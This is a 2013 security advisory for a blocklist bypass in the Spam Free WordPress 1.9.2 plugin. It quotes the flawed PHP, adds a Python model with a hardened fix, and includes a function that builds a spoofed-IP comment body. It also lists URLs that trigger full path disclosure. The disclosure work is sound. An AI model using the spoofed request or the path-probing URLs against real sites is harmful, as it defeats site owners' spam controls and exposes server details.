WordPress Spam Free 1.9.2 Filter Bypass

2013-01-05T00:00:00
ID PACKETSTORM:119274
Type packetstorm
Reporter Akastep
Modified 2013-01-05T00:00:00

Description

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[Inj3ct0r / 1337day.com ASCII banner]
>> Exploit database separated by exploit type (local, remote, DoS, etc.)

[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com

#########################################
I'm AkaStep member from Inj3ct0r Team
#########################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  
=======================================================  
Vulnerable software: Spam Free Wordpress plugin Version 1.9.2  
Download link: http://wordpress.org/extend/plugins/spam-free-wordpress/  
Vuln: IP based Blocklist restriction Bypass.  
=======================================================  
Tested On: Debian squeeze 6.0.6  
Server version: Apache/2.2.16 (Debian)  
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)  
Copyright (c) 1997-2009 The PHP Group  
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies  
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH  
=======================================================  
About vuln:  
The plugin trusts the client for the one value its blocklist depends on. The commenter's IP address is not read from $_SERVER['REMOTE_ADDR']; it is taken from $_POST['comment_ip'], a form field that the visitor's browser submits together with the comment. Anyone can change that field before posting (an intercepting proxy, a browser devtools edit, or a hand-built POST to wp-comments-post.php), so a blocklisted address simply sends a non-blocklisted value and passes sfw_local_blocklist_check(). The nonce and the per-post password are still verified, but both come from the same comment form, so an ordinary visitor already has them. The result: the IP blocklist (if it is enabled) can be bypassed by any commenter.  
  
/spam-free-wordpress/includes/functions.php  
==================SNIP========================  
// Function for wp-comments-post.php file located in the root Wordpress directory. The same directory as the wp-config.php file.  
function sfw_comment_post_authentication() {  
    global $post, $sfw_options;  
  
    //$sfw_comment_script = get_post_meta( $post->ID, 'sfw_comment_form_password', true );  
    $sfw_comment_script = get_transient( $post->ID. '-' .$_POST['pwdfield'] );  
  
    // The "commenter IP" is read from the POST body (a form field the client fills in),  
    // not from $_SERVER['REMOTE_ADDR'], so the submitter chooses the value that gets checked.  
    $cip = $_POST['comment_ip'];  
  
    // If the reader is logged in don't require password for wp-comments-post.php  
    if( !is_user_logged_in() ) {  
        // Nonce check  
        if( empty( $_POST['sfw_comment_nonce'] ) || !wp_verify_nonce( $_POST['sfw_comment_nonce'],'sfw_nonce' ) )  
            wp_die( __( 'Spam Free Wordpress rejected your comment because you failed a critical security check.', 'spam-free-wordpress' ) . sfw_spam_counter(), 'Spam Free Wordpress rejected your comment', array( 'response' => 200, 'back_link' => true ) );  
  
        // Compares current comment form password with current password for post  
        if( empty( $_POST['pwdfield'] ) || $_POST['pwdfield'] != $sfw_comment_script )  
            wp_die( __( 'Spam Free Wordpress rejected your comment because you did not enter the correct password or it was empty.', 'spam-free-wordpress' ) . sfw_spam_counter(), 'Spam Free Wordpress rejected your comment', array( 'response' => 200, 'back_link' => true ) );  
  
        // Compares commenter IP address to local blocklist  
        // (both the value being checked and the value it is compared against derive from $_POST['comment_ip'])  
        if( empty( $_POST['comment_ip'] ) || $_POST['comment_ip'] == sfw_local_blocklist_check( $cip ) )  
            wp_die( __( 'Comment blocked by Spam Free Wordpress because your IP address is in the local blocklist, or you forgot to type a comment.', 'spam-free-wordpress' ) . sfw_spam_counter(), 'Spam Blocked by Spam Free Wordpress local blocklist', array( 'response' => 200, 'back_link' => true ) );  
  
    }  
  
===============EOF SNIP=========================  
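What the snippet means in practice, as an added example that is not part of the advisory or of the plugin's code: the Python model below mirrors the plugin's decision (the address that is checked comes from the POST field) next to a hardened version that uses the TCP peer address and only honours X-Forwarded-For from a proxy the site operator controls, and it builds the form body a blocklisted commenter would submit to wp-comments-post.php. The blocklist entries, the client and proxy addresses, the comment-form field values and the assumption that sfw_local_blocklist_check() is a plain membership lookup are all constructed for this demonstration.

```python
"""
Added example: model of the Spam Free WordPress 1.9.2 blocklist decision
and a hardened replacement. Not the plugin's code and not the advisory's.
ASSUMPTION: sfw_local_blocklist_check() is treated as a simple "is this IP
on the list" lookup; the advisory does not reproduce it.
"""
import ipaddress
from typing import Iterable, Mapping
from urllib.parse import urlencode

# Constructed blocklist: one host entry and one CIDR entry (format assumed).
BLOCKLIST = ("203.0.113.7", "198.51.100.0/24")


def local_blocklist_check(ip: str, blocklist: Iterable[str] = BLOCKLIST) -> bool:
    """True if ip falls inside any blocklist entry. Garbage that is not an
    IP address is treated as not listed, which is itself a bypass when the
    value comes from the client."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in ipaddress.ip_network(entry, strict=False) for entry in blocklist)


def vulnerable_decision(post: Mapping[str, str], remote_addr: str) -> bool:
    """Mirrors the plugin: the address checked is $_POST['comment_ip'].
    remote_addr (what $_SERVER['REMOTE_ADDR'] holds) is never consulted.
    Returns True when the comment passes the blocklist stage."""
    cip = post.get("comment_ip", "")
    if not cip:
        return False  # plugin: "...or you forgot to type a comment"
    return not local_blocklist_check(cip)


def client_ip(remote_addr: str, headers: Mapping[str, str],
              trusted_proxies: Iterable[str] = ()) -> str:
    """Hardened source of truth: the TCP peer address, or the rightmost
    X-Forwarded-For hop only when the peer is a proxy you operate (the
    rightmost entry is the address that connected to that proxy).
    Never a value from the form body."""
    if remote_addr in set(trusted_proxies):
        hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
        if hops:
            return hops[-1]
    return remote_addr


def hardened_decision(post: Mapping[str, str], remote_addr: str,
                      headers: Mapping[str, str],
                      trusted_proxies: Iterable[str] = ()) -> bool:
    """Same policy as the plugin, but the address is the server's own view
    of the client; 'post' is accepted only to show it is ignored."""
    return not local_blocklist_check(client_ip(remote_addr, headers, trusted_proxies))


def build_bypass_body(comment: str, spoofed_ip: str, nonce: str,
                      pwdfield: str, post_id: int) -> str:
    """Form body a blocklisted client posts to wp-comments-post.php.
    Nonce and password are the legitimate values the comment form handed
    out; only comment_ip is replaced. Field names other than the three
    from the snippet are standard WordPress comment-form fields."""
    return urlencode({
        "comment": comment,
        "comment_post_ID": post_id,
        "author": "visitor",            # constructed
        "email": "visitor@example.com",  # constructed
        "sfw_comment_nonce": nonce,
        "pwdfield": pwdfield,
        "comment_ip": spoofed_ip,
    })


def run_demo() -> tuple:
    """A blocklisted client (203.0.113.7) tries an honest form, then a
    spoofed one, against both decision functions."""
    blocked_client = "203.0.113.7"
    honest_form = {"comment_ip": blocked_client}
    spoofed_form = {"comment_ip": "192.0.2.44"}
    return (
        vulnerable_decision(honest_form, blocked_client),    # False: honest form is blocked
        vulnerable_decision(spoofed_form, blocked_client),   # True: spoofed field passes
        hardened_decision(spoofed_form, blocked_client, {}), # False: peer address is used
        # False: X-Forwarded-For from an untrusted peer is ignored too
        hardened_decision(spoofed_form, blocked_client, {"X-Forwarded-For": "192.0.2.44"}),
    )


if __name__ == "__main__":
    print(run_demo())
    print(build_bypass_body("nice post", "192.0.2.44", "abc123", "s3cret", 42))
```

The last case in run_demo() is the caveat that matters when fixing this: moving the lookup to a request header is not enough, because X-Forwarded-For is as client-controlled as the form field unless the peer is a proxy you operate; the plugin's own check on an empty comment_ip value also shows that a non-IP string slips through the lookup.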
  
Proof of concept video about this vulnerability can be found here:  
  
http://www.youtube.com/watch?v=vbUzJS0EdFA&feature=youtu.be  
  
FULL PATH DISCLOSURES:  
Several plugin files can be requested directly, outside the WordPress bootstrap. They do not bail out when loaded that way (the usual guard is a check for ABSPATH at the top of the file), and with PHP's display_errors enabled on the server each request answers with a fatal error that reveals the absolute installation path. Direct access:  
  
http://hacker1.own/wp/wp-content/plugins/spam-free-wordpress//comments.php  
  
Fatal error: Call to a member function sfw_comment_form_header() on a non-object in /etc/apache2/htdocs/hacker1/wp/wp-content/plugins/spam-free-wordpress/comments.php on line 8   
  
http://hacker1.own/wp/wp-content/plugins/spam-free-wordpress//admin/class-menu.php  
  
Fatal error: Call to undefined function add_action() in /etc/apache2/htdocs/hacker1/wp/wp-content/plugins/spam-free-wordpress/admin/class-menu.php on line 9   
  
http://hacker1.own/wp/wp-content/plugins/spam-free-wordpress//tl-spam-free-wordpress.php  
  
Fatal error: Call to undefined function __() in /etc/apache2/htdocs/hacker1/wp/wp-content/plugins/spam-free-wordpress/tl-spam-free-wordpress.php on line 24   
  
http://hacker1.own/wp/wp-content/plugins/spam-free-wordpress//includes/functions.php  
  
Fatal error: Call to undefined function add_filter() in /etc/apache2/htdocs/hacker1/wp/wp-content/plugins/spam-free-wordpress/includes/functions.php on line 269   
  
  
There is also an XSS vulnerability when inserting the API key (license key).  
In practice it is not exploitable by a third party, because the settings form is protected by a wp_nonce anti-CSRF token, so an attacker cannot submit the payload on the administrator's behalf.  
  
  
================================================  
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
  
to all Aa Team + to all Azerbaijan Black HatZ  
+ *Especially to my bro CAMOUFL4G3 *  
To All Turkish Hackers  
  
Also special thanks to: ottoman38 & HERO_AZE  
================================================  
  
/AkaStep  
  